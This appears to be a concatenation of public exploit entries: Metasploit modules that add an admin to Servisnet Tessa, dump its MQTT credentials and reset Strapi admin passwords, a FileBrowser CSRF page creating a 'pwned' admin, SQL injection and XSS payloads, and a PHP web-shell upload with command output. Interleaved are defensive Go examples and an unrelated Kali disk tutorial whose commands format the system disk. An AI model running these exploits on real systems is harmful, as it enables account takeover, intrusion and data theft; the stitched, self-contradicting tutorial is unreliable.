##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)',
      'Description'    => %q(
        This module exploits an authentication bypass in Servisnet Tessa, triggered by adding a new sysadmin user.
        The app.js that acts as the backend of the application is publicly available.
        By exposing a default value for the "Authorization" HTTP header,
        it is possible to make unauthenticated requests to some areas of the application.
        Even MQTT (Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.
        A new admin user can be added to the database with this header obtained in the source code.
      ),
      'References'     =>
        [
          [ 'CVE', 'CVE-2022-22831' ],
          [ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Add-sysAdmin-User-Unauthenticated.html' ],
          [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]
        ],
      'Author'         =>
        [
          'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => "Dec 22 2021",
      'DefaultOptions' =>
        {
          'RPORT' => 443,
          'SSL'   => true
        }
    ))

    register_options([
        OptString.new('TARGETURI',  [true, 'Base path for application', '/'])
    ])
  end
  # Extract the string assigned to an app.js entry of the form ["<key>"] = "<value>",
  # e.g. default.a.defaults.headers.post["Authorization"] = "Basic ...".
  def split(data, string_to_split)
    data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/).flatten.join
  end

  # for Origin and Referer headers
  # Read the API base path (baseURL) out of the public app.js.
  def app_path
    res = send_request_cgi({
      # default.a.get( check
      'uri'    => normalize_uri(target_uri.path, 'js', 'app.js'),
      'method' => 'GET'
    })

    if res && res.code == 200 && res.body =~ /baseURL/
      base_url = res.body.scan(/baseURL: '\/([\S\s]*?)'/)[0][0]
      print_status("baseURL: #{base_url}")
      return base_url
    else
      fail_with(Failure::NotVulnerable, 'baseURL not found!')
    end
  end

  def add_user
     token = auth_bypass
     newuser = Rex::Text.rand_text_alpha_lower(8)	
     id = Rex::Text.rand_text_numeric(4)   
     # encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111
     json_data = '{"alarm_request": 1, "city_id": null, "city_name": null, "decryptPassword": null, "email": "' + newuser + '@localhost.local", "id": ' + id + ', "invisible": 0, "isactive": 1, "isblocked": 0, "levelstatus": 1, "local_authorization": 1, "mail_request": 1, "name": "' + newuser + '", "password": "hxZ8I33nmy9PZNhYhms/Dg==", "phone": null, "position": null, "region_name": "test4", "regional_id": 0, "role_id": 1, "role_name": "Sistem Admin", "rolelevel": 3, "status": null, "surname": "' + newuser + '", "totalRecords": null, "try_pass_right": 0, "userip": null, "username": "' + newuser + '", "userType": "Lokal Kullanıcı"}'

     res = send_request_cgi(
       {
       'method' => 'POST',
       'ctype'  => 'application/json',
       'uri' => normalize_uri(target_uri.path, app_path, 'users'),
       'headers' =>
         {
           'Authorization' => token
         },
       'data' => json_data
      })

      if res && res.code == 200 && res.body =~ /localhost/
        print_good("The sysAdmin authorized user has been successfully added.")
        print_status("Username: #{newuser}")
        print_status("Password: 1111111111")
      else
        fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.')
      end
  end

  # Pull the hard-coded default "Authorization" header out of the public app.js.
  def auth_bypass
    res = send_request_cgi({
      # default.a.defaults.headers.post["Authorization"] check
      'uri'    => normalize_uri(target_uri.path, 'js', 'app.js'),
      'method' => 'GET'
    })

    if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/
      token = split(res.body, 'Authorization')
      print_status("Authorization: #{token}")
      return token
    else
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
  end

  # A Basic credential shipped as the default header is the vulnerable condition.
  def check
    if auth_bypass =~ /Basic/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end
  
  def run
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    add_user    
  end
end
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/mqtt'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::MQTT
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)',
      'Description'    => %q(
        This module exploits an MQTT credential disclosure in Servisnet Tessa.
        The app.js that acts as the backend of the application is publicly available.
        By exposing a default value for the "Authorization" HTTP header,
        it is possible to make unauthenticated requests to some areas of the application.
        Even MQTT (Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.
        A new admin user can be added to the database with this header obtained in the source code.

        The module tries to log in to the MQTT service with the credentials it has obtained,
        and reflects the response it receives from the service.
      ),
      'References'     =>
        [
          [ 'CVE', 'CVE-2022-22833' ],
          [ 'URL', 'https://pentest.com.tr/exploits/Servisnet-Tessa-MQTT-Credentials-Dump-Unauthenticated.html' ],
          [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]
        ],
      'Author'         =>
        [
          'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => "Dec 22 2021",
      'DefaultOptions' =>
        {
          'RPORT' => 443,
          'SSL'   => true
        }
    ))

    register_options([
        OptString.new('TARGETURI',  [true, 'Base path for application', '/'])
    ])
  end
  # Extract the string assigned to an app.js entry of the form ["<key>"] = "<value>",
  # e.g. default.a.defaults.headers.post["Authorization"] = "Basic ...".
  def split(data, string_to_split)
    data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/).flatten.join
  end

  # Scrape the MQTT connection block from app.js and try the embedded credentials.
  def check_mqtt
    res = send_request_cgi({
      # default.a.get( check
      'uri'    => normalize_uri(target_uri.path, 'js', 'app.js'),
      'method' => 'GET'
    })

    if res && res.code == 200 && res.body =~ /connectionMQTT/
      data = res.body
      mqtt_host = data.scan(/host: '([\S\s]*?)'/)[0][0]
      rhost = mqtt_host.split('mqtts://').join('')
      print_status("MQTT Host: #{mqtt_host}")
      mqtt_port = data.scan(/port: ([\S\s]*?),/)[0][0].to_i
      print_status("MQTT Port: #{mqtt_port}")
      mqtt_end = data.scan(/endpoint: '([\S\s]*?)'/)[0][0]
      print_status("MQTT Endpoint: #{mqtt_end}")
      mqtt_cl = data.scan(/clientId: '([\S\s]*?)'/)[0][0]
      print_status("MQTT clientId: #{mqtt_cl}")
      # The MQTT credentials are the second username:/password: match in app.js (index 1).
      mqtt_usr = data.scan(/username: '([\S\s]*?)'/)[1][0]
      print_status("MQTT username: #{mqtt_usr}")
      mqtt_pass = data.scan(/password: '([\S\s]*?)'/)[1][0]
      print_status("MQTT password: #{mqtt_pass}")

      print_status("##### Starting MQTT login sweep #####")

      # Removed brute force materials that can be included for the collection.
      cred_collection = Metasploit::Framework::CredentialCollection.new(
        password: mqtt_pass,
        username: mqtt_usr
      )
      # this definition already exists in "auxiliary/scanner/mqtt/connect". Moved into exploit.
      cred_collection = prepend_db_passwords(cred_collection)

      scanner = Metasploit::Framework::LoginScanner::MQTT.new(
        host: rhost,
        port: mqtt_port,
        read_timeout: datastore['READ_TIMEOUT'],
        client_id: client_id,
        proxies: datastore['PROXIES'],
        cred_details: cred_collection,
        stop_on_success: datastore['STOP_ON_SUCCESS'],
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
        connection_timeout: datastore['ConnectTimeout'],
        max_send_size: datastore['TCP::max_send_size'],
        send_delay: datastore['TCP::send_delay'],
        framework: framework,
        framework_module: self,
        ssl: datastore['SSL'],
        ssl_version: datastore['SSLVersion'],
        ssl_verify_mode: datastore['SSLVerifyMode'],
        ssl_cipher: datastore['SSLCipher'],
        local_port: datastore['CPORT'],
        local_host: datastore['CHOST']
      )

      scanner.scan! do |result|
        credential_data = result.to_h
        credential_data.merge!(
          module_fullname: fullname,
          workspace_id: myworkspace_id
        )
        password = result.credential.private
        username = result.credential.public
        if result.success?
          credential_core = create_credential(credential_data)
          credential_data[:core] = credential_core
          create_credential_login(credential_data)
          print_good("MQTT Login Successful: #{username}/#{password}")
        else
          invalidate_login(credential_data)
          vprint_error("MQTT LOGIN FAILED: #{username}/#{password} (#{result.proof})")
        end
      end
    else
      fail_with(Failure::NotVulnerable, 'connectionMQTT block not found in app.js')
    end
  end

  # Pull the hard-coded default "Authorization" header out of the public app.js.
  def auth_bypass
    res = send_request_cgi({
      # default.a.defaults.headers.post["Authorization"] check
      'uri'    => normalize_uri(target_uri.path, 'js', 'app.js'),
      'method' => 'GET'
    })

    if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/
      token = split(res.body, 'Authorization')
      print_status("Authorization: #{token}")
      return token
    else
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
  end

  # A Basic credential shipped as the default header is the vulnerable condition.
  def check
    if auth_bypass =~ /Basic/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end
  
  def run
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    check_mqtt    
  end
end
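Both Tessa modules above work because the served app.js carries a default "Authorization" header and a connectionMQTT block with a username and password. The Go program below is an added example, not code from either module or from Servisnet: a bundle audit a defender can run over a built front end before it is deployed, which flags both patterns and decodes the Basic value to name the affected account without re-printing the password. AuditBundle, Finding, basicUser and the app.js excerpt in sampleBundle are all constructed for this example.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
)

// Finding is one credential-bearing statement located in a served JavaScript bundle.
type Finding struct {
	Kind    string // "authorization-default" or "mqtt-credentials"
	Account string // user name the secret belongs to, when it can be determined
	Where   string // byte offset in the bundle, for the report
}

var (
	// Same assignment shape the Tessa modules scrape:
	//   default.a.defaults.headers.post["Authorization"] = "Basic ..."
	reAuthDefault = regexp.MustCompile(`headers\.post\["Authorization"\]\s*=\s*"([^"]+)"`)
	reMQTTUser    = regexp.MustCompile(`username:\s*'([^']*)'`)
	reMQTTPass    = regexp.MustCompile(`password:\s*'([^']*)'`)
)

// basicUser returns the user name inside "Basic base64(user:pass)". The
// password is deliberately not returned so a report does not re-leak it.
func basicUser(header string) (string, bool) {
	if !strings.HasPrefix(header, "Basic ") {
		return "", false
	}
	raw, err := base64.StdEncoding.DecodeString(strings.TrimPrefix(header, "Basic "))
	if err != nil {
		return "", false
	}
	user, _, found := strings.Cut(string(raw), ":")
	return user, found
}

// AuditBundle scans a bundle and reports hard-coded HTTP and MQTT credentials.
// The MQTT pair is read from inside the connectionMQTT block rather than by
// positional match index, which is what the modules above rely on.
func AuditBundle(js string) []Finding {
	var out []Finding
	for _, loc := range reAuthDefault.FindAllStringSubmatchIndex(js, -1) {
		f := Finding{Kind: "authorization-default", Where: fmt.Sprintf("offset %d", loc[0])}
		if u, ok := basicUser(js[loc[2]:loc[3]]); ok {
			f.Account = u
		}
		out = append(out, f)
	}
	if start := strings.Index(js, "connectionMQTT"); start >= 0 {
		block := js[start:]
		if end := strings.Index(block, "}"); end >= 0 {
			block = block[:end+1]
		}
		u := reMQTTUser.FindStringSubmatch(block)
		p := reMQTTPass.FindStringSubmatch(block)
		if u != nil && p != nil && p[1] != "" {
			out = append(out, Finding{Kind: "mqtt-credentials", Account: u[1], Where: fmt.Sprintf("offset %d", start)})
		}
	}
	return out
}

// sampleBundle is a constructed excerpt in the shape the modules expect. The
// login-form username/password that precedes the MQTT block is why a
// positional match ([1][0]) is fragile and a block-scoped match is used here.
const sampleBundle = `var form = {username: '', password: ''};
default.a.defaults.headers.post["Authorization"] = "Basic dGVzc2E6c2VjcmV0";
default.a.get({baseURL: '/api'});
connectionMQTT = {host: 'mqtts://mqtt.example.invalid', port: 8883, endpoint: '/mqtt', clientId: 'tessa-web', username: 'tessa-mqtt', password: 'constructed-sample'};`

func main() {
	for _, f := range AuditBundle(sampleBundle) {
		fmt.Printf("%-22s account=%q %s\n", f.Kind, f.Account, f.Where)
	}
}
```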
            
# Exploit Title: FileBrowser 2.17.2 - Cross Site Request Forgery (CSRF) to Remote Code Execution (RCE)
# Date: 5/2/2022
# Exploit Author: FEBIN MON SAJI
# Vendor Homepage: https://filebrowser.org/
# Software Link: https://github.com/filebrowser/filebrowser
# Version: FileBrowser <= 2.17.2
# Tested on: Ubuntu 20.04
# CVE : CVE-2021-46398

1. Description:

A Cross-Site Request Forgery vulnerability exists in Filebrowser < 2.18.0 that allows attackers to create a backdoor user with admin privilege and get access to the filesystem via a malicious HTML webpage that is sent to the victim. An admin can run commands using the FileBrowser and hence it leads to RCE.

2. Proof Of Concept:

<html>
   <script> 
   setTimeout(function() {document.forms["exploit"].submit();}, 3000);
   </script>
  <body style="text-align:center;">
  <h1> FileBrowser CSRF PoC by Febin </h1>
 
  <!-- This create a admin privileged backdoor user named "pwned" with password "pwned" -->
  
  <!-- Change the URL in the form action -->
  
    <form action="http://127.0.0.1:8080/api/users" method="POST" enctype="text/plain" name="exploit">
     
      <!-- Change the "scope" parameter in the payload as your choice -->
     
      <input type="hidden" name='{"what":"user","which":[],"data":{"scope":"../../../../root/","locale":"en","viewMode":"mosaic","singleClick":false,"sorting":{"by":"","asc":false},"perm":{"admin":true,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true},"commands":[],"hideDotfiles":false,"username":"pwned","password":"","rules":[{"allow":true,"path":"../","regex":false,"regexp":{"raw":""}}],"lockPassword":false,"id":0,"password":"pwned"}}' value='test'>
    
    </form>

  </body>

</html>



3. HTTP request intercept:

POST /api/users HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain
Content-Length: 465
Connection: close
Cookie: auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjoxLCJsb2NhbGUiOiJlbiIsInZpZXdNb2RlIjoibW9zYWljIiwic2luZ2xlQ2xpY2siOmZhbHNlLCJwZXJtIjp7ImFkbWluIjp0cnVlLCJleGVjdXRlIjp0cnVlLCJjcmVhdGUiOnRydWUsInJlbmFtZSI6dHJ1ZSwibW9kaWZ5Ijp0cnVlLCJkZWxldGUiOnRydWUsInNoYXJlIjp0cnVlLCJkb3dubG9hZCI6dHJ1ZX0sImNvbW1hbmRzIjpbXSwibG9ja1Bhc3N3b3JkIjpmYWxzZSwiaGlkZURvdGZpbGVzIjpmYWxzZX0sImV4cCI6MTY0NDA4OTE3MiwiaWF0IjoxNjQ0MDgxOTcyLCJpc3MiOiJGaWxlIEJyb3dzZXIifQ.hdFWg3SIQQ-4P8K48yru-152NGItZPKau6EBL6m8RJE
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-GPC: 1

{"what":"user","which":[],"data":{"scope":"../../../../root/","locale":"en","viewMode":"mosaic","singleClick":false,"sorting":{"by":"","asc":false},"perm":{"admin":true,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true},"commands":[],"hideDotfiles":false,"username":"pwned","password":"","rules":[{"allow":true,"path":"../","regex":false,"regexp":{"raw":""}}],"lockPassword":false,"id":0,"password":"pwned"}}=test


4. References:

https://febin0x4e4a.wordpress.com/2022/01/19/critical-csrf-in-filebrowser/
https://febin0x4e4a.blogspot.com/2022/01/critical-csrf-in-filebrowser.html
https://systemweakness.com/critical-csrf-to-rce-in-filebrowser-865a3c34b8e7



5. Detailed Description:

The Vulnerability - CSRF to RCE

FileBrowser is a popular file manager/file managing interface developed in the Go language. An admin can create multiple users, even another admin-privileged user, and give access to any directory he wants; user creation is handled by the endpoint “/api/users”.

The endpoint accepts input in JSON format to create users, but fails to verify the “Content-Type” HTTP header: its value should be “application/json”, yet “text/plain” is accepted, and that is where the vulnerability arises. Also, the “Origin” is not validated and there are no anti-CSRF tokens implemented either.

Hence an attacker can easily exploit this vulnerability to create a backdoor user with admin privileges and access to the home directory, or whichever directory the attacker wants, just by sending a malicious webpage URL to the legitimate admin, and thereby access the whole filesystem of the victim.

And since an admin can run commands on the system, this vulnerability leads to RCE.
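The three missing checks described above, as an added Go example that is not FileBrowser's own code: a request guard that enforces application/json, Sec-Fetch-Site and Origin, plus a strict JSON decoder that refuses the "=test" tail an enctype="text/plain" form appends to its field name. csrfGuard, decodeUserStrict and the two request builders are hypothetical; the shortened body and the headers are constructed from the capture in section 3.

```go
package main

import (
	"bytes"
	"encoding/json"
	"errors"
	"fmt"
	"io"
	"mime"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// exploitBody is a constructed, shortened copy of the body captured in section 3:
// the JSON carried in the form field's name, plus the "=test" that
// enctype="text/plain" appends (field name, "=", field value).
const exploitBody = `{"what":"user","which":[],"data":{"perm":{"admin":true},"username":"pwned","password":"pwned"}}=test`

// csrfGuard applies the three checks the vulnerable /api/users handler lacked.
// Hypothetical helper written for this page; not FileBrowser's own code.
func csrfGuard(r *http.Request, serverHost string) error {
	// 1. An HTML form can only submit urlencoded, multipart or text/plain
	//    bodies, so requiring application/json already defeats the PoC form;
	//    a cross-origin script would need a CORS preflight to send it.
	ct, _, err := mime.ParseMediaType(r.Header.Get("Content-Type"))
	if err != nil || ct != "application/json" {
		return fmt.Errorf("unsupported Content-Type %q", r.Header.Get("Content-Type"))
	}
	// 2. Fetch metadata: the browser labels the PoC submission cross-site.
	switch site := r.Header.Get("Sec-Fetch-Site"); site {
	case "", "same-origin", "none":
	default:
		return fmt.Errorf("cross-site request (Sec-Fetch-Site=%s)", site)
	}
	// 3. Origin, when the browser sends it, must name this server.
	if origin := r.Header.Get("Origin"); origin != "" {
		u, err := url.Parse(origin)
		if origin == "null" || err != nil || !strings.EqualFold(u.Host, serverHost) {
			return fmt.Errorf("origin %q does not match %q", origin, serverHost)
		}
	}
	return nil
}

// decodeUserStrict parses the JSON body and refuses trailing bytes, so the
// "...}=test" body is rejected even if a handler skipped csrfGuard. A plain
// json.Decoder.Decode stops at the closing brace and would accept it.
func decodeUserStrict(body []byte) (map[string]any, error) {
	dec := json.NewDecoder(bytes.NewReader(body))
	var v map[string]any
	if err := dec.Decode(&v); err != nil {
		return nil, err
	}
	if _, err := dec.Token(); err != io.EOF {
		return nil, errors.New("trailing data after JSON value")
	}
	return v, nil
}

// exploitRequest rebuilds the headers of the intercepted request that matter here.
func exploitRequest() *http.Request {
	r := httptest.NewRequest(http.MethodPost, "http://127.0.0.1:8081/api/users", strings.NewReader(exploitBody))
	r.Header.Set("Content-Type", "text/plain")
	r.Header.Set("Sec-Fetch-Site", "cross-site")
	r.Header.Set("Sec-Fetch-Mode", "navigate")
	return r
}

// legitRequest models the FileBrowser front end calling its own API.
func legitRequest() *http.Request {
	body := `{"what":"user","which":[],"data":{"username":"alice"}}`
	r := httptest.NewRequest(http.MethodPost, "http://127.0.0.1:8081/api/users", strings.NewReader(body))
	r.Header.Set("Content-Type", "application/json")
	r.Header.Set("Origin", "http://127.0.0.1:8081")
	r.Header.Set("Sec-Fetch-Site", "same-origin")
	return r
}

func main() {
	for _, c := range []struct {
		name string
		r    *http.Request
	}{{"PoC form post", exploitRequest()}, {"front-end XHR", legitRequest()}} {
		fmt.Printf("%-14s guard: %v\n", c.name, csrfGuard(c.r, c.r.Host))
	}
	_, err := decodeUserStrict([]byte(exploitBody))
	fmt.Println("strict decode of PoC body:", err)
}
```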
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,

      'Name'           => "Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)",
      'Description'    => %q{
        This exploit module abuses the mishandling of password reset in JSON for Strapi CMS version 3.0.0-beta.17.4 to change the password of a privileged user.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'WackyH4cker' ],
      'References'     =>
        [
          [ 'URL', 'https://vulners.com/cve/CVE-2019-18818' ]
        ],
      'Platform'       => 'linux',
      'Targets'        => [
        [ 'Strapi 3.0.0-beta-17.4', {} ]
      ],
      'Payload'        => '',
      'Privileged'     => true,
      'DisclosureDate' => "",
      'DefaultOptions' =>
        {
          'SSL'   => false,
          'RPORT' => 80
        },
      'DefaultTarget'  => 0

      ))

      register_options [
        OptString.new('NEW_PASSWORD', [true, 'New password for user Admin'])
      ]
  end

  # /admin/init reports the Strapi version unauthenticated; only 3.0.0-beta.17.4 is targeted.
  def check
    res = send_request_raw({ 'uri' => '/admin/init' })
    return Exploit::CheckCode::Unknown unless res && res.code == 200

    version = JSON.parse(res.body)
    if version.dig('data', 'strapiVersion') == '3.0.0-beta.17.4'
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  rescue JSON::ParserError
    return Exploit::CheckCode::Unknown
  end

  def run

    json_body = { 'code' => {'$gt' => 0},
      'password' => datastore['NEW_PASSWORD'],
      'passwordConfirmation' => datastore['NEW_PASSWORD'] }

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => '/admin/auth/reset-password',
      'ctype' => 'application/json',
      'data' => JSON.generate(json_body)
    })

    print_status("Changing password...")
    if res && res.code == 200
      jwt = JSON.parse(res.body)['jwt']
      print_good("Password changed successfully!")
      print_good("USER: admin")
      print_good("PASSWORD: #{datastore['NEW_PASSWORD']}")
      print_good("JWT: #{jwt}")
    else
      fail_with(Failure::NoAccess, 'Could not change admin user password')
    end
  end

end
            
Hospital Management System 4.0 - 'multiple' SQL Injection

# Title: Hospital Management System 4.0 - 'multiple' SQL Injection
# Author: nu11secur1ty
# Date: 02.06.2022
# Vendor: https://github.com/kishan0725
# Software: https://github.com/kishan0725/Hospital-Management-System
# CVE-2022-24263

## Description:
The Hospital Management System v4.0 is suffering from multiple SQL injections via three parameters in the function.php, contact.php, and func3.php applications. An attacker can retrieve all information from the system by using this vulnerability, and a malicious actor can also use sensitive information from the customers of this system.
WARNING: If this is in some external domain, or some subdomain, or internal, this will be extremely dangerous!

Status: CRITICAL

[+] Payloads:

---
Parameter: txtName (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: txtName=821761' AND (SELECT 9346 FROM (SELECT(SLEEP(3)))HJGv) AND 'xkCZ'='xkCZ&txtEmail=xstxPhYW@https://github.com/kishan0725/Hospital-Management-System&txtPhone=813-439-23'+(select load_file('\\\\k0lnu24kl14z5bxcoo5tj7z4bvho5fz3q6ey1qpf.https://github.com/kishan0725/Hospital-Management-System\\hgq'))+'&btnSubmit=Send Message&txtMsg=441931
---

-------------------------------------------

---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2936) OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN 1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login

    Type: UNION query
    Title: MySQL UNION query (random number) - 1 column
    Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2730) UNION ALL SELECT 8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login
---

-------------------------------------------

---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: username3=CHnDaCTc'+(select-2423) OR 1 GROUP BY CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0 END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login

    Type: UNION query
    Title: MySQL UNION query (random number) - 1 column
    Payload: username3=CHnDaCTc'+(select-3282) UNION ALL SELECT CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login
---

## Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-24263
# Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting (XSS)
# Date: 2022-02-04
# Author: Milad karimi
# Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/
# Version: 1.2
# Tested on: Windows 11
# CVE: N/A

1. Description:
This plugin creates a cf7-international-sms-integration from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:
http://localhost/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page=<script>alert("test")</script>
Title: Expand the disk for Kali Linux

When Kali was installed, a 40G disk was allocated, but as more and more files are stored in Kali, that disk is no longer enough. So how do you expand the Kali disk?

First, let's look at the remaining space on this machine:
df
As you can see, disk usage has reached 100%.

Allocate space to Kali
Open the virtual machine settings, click Add at the bottom, then Add Hard Drive. Here I am adding 10G of capacity.

Execute the following command in the terminal:
fdisk -l
Here we see the 10G hard disk we just added. Take the device name from this listing: an added virtual disk appears as a separate device next to the existing one, and the partition, format and mount commands below must be run against that new device, because formatting the disk that holds the running system would destroy it.

Next we need to partition /dev/sda. Execute the command:
fdisk /dev/sda

Format the partition:
mke2fs -t ext4 /dev/sda

Mount the disk
At this point I want to mount the 10G disk on the /root directory. Execute the command:
mount /dev/sda /root
However, this only takes effect once: the mount is lost after the PC is restarted, so we set it in the configuration file instead.

Modify the configuration file
The format of each line is as follows:
UUID=<uuid>  <mount directory>  <file system format>  <mount options>  <whether to back up>  <whether to self-check>
The UUID is obtained with blkid:
blkid
vim /etc/fstab

In this way, we have completed the expansion of the disk.
# Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-02-08
# Exploit Author: Juli Agarwal(@agarwaljuli)
# Vendor Homepage: https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
# Version: 1.0
# Tested on: XAMPP, Kali Linux

Description - The application suffers from a remote code execution in the admin panel. An authenticated attacker can upload a web-shell PHP file on the profile page to achieve remote code execution.

POC:-

==========
# Request:
==========

POST /erms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------37791356766765055891341961306
Content-Length: 1004
Origin: http://localhost
Connection: close
Referer: http://localhost/erms/admin/?page=user
Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a

-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="id"

1
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="firstname"

Adminstrator
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="lastname"

Admin
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="username"

admin
-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="password"


-----------------------------37791356766765055891341961306
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/x-php

<html>
<body>
<b>Remote code execution: </b><br><pre>
<?php
if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
</pre>
</body>
</html>
-----------------------------37791356766765055891341961306--

================
# Webshell access:
================

# Webshell access via:
POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id

# Webshell response:
Remote code execution:
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Cain & Abel 4.9.56 - Unquoted Service Path

# Exploit Title: Cain & Abel 4.9.56 - Unquoted Service Path
# Exploit Author: Aryan Chehreghani
# Date: 2022-02-08
# Software Link: https://www.malavida.com/en/soft/cain-and-abel
# Version: 4.9.56
# Tested on: Windows 10 x64

# PoC

SERVICE_NAME: Abel
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Cain\Abel64.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Abel
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
Exam Reviewer Management System 1.0 - ‘id’ SQL Injection

# Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection
# Date: 2022-02-18
# Exploit Author: Juli Agarwal(@agarwaljuli)
# Vendor Homepage: https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
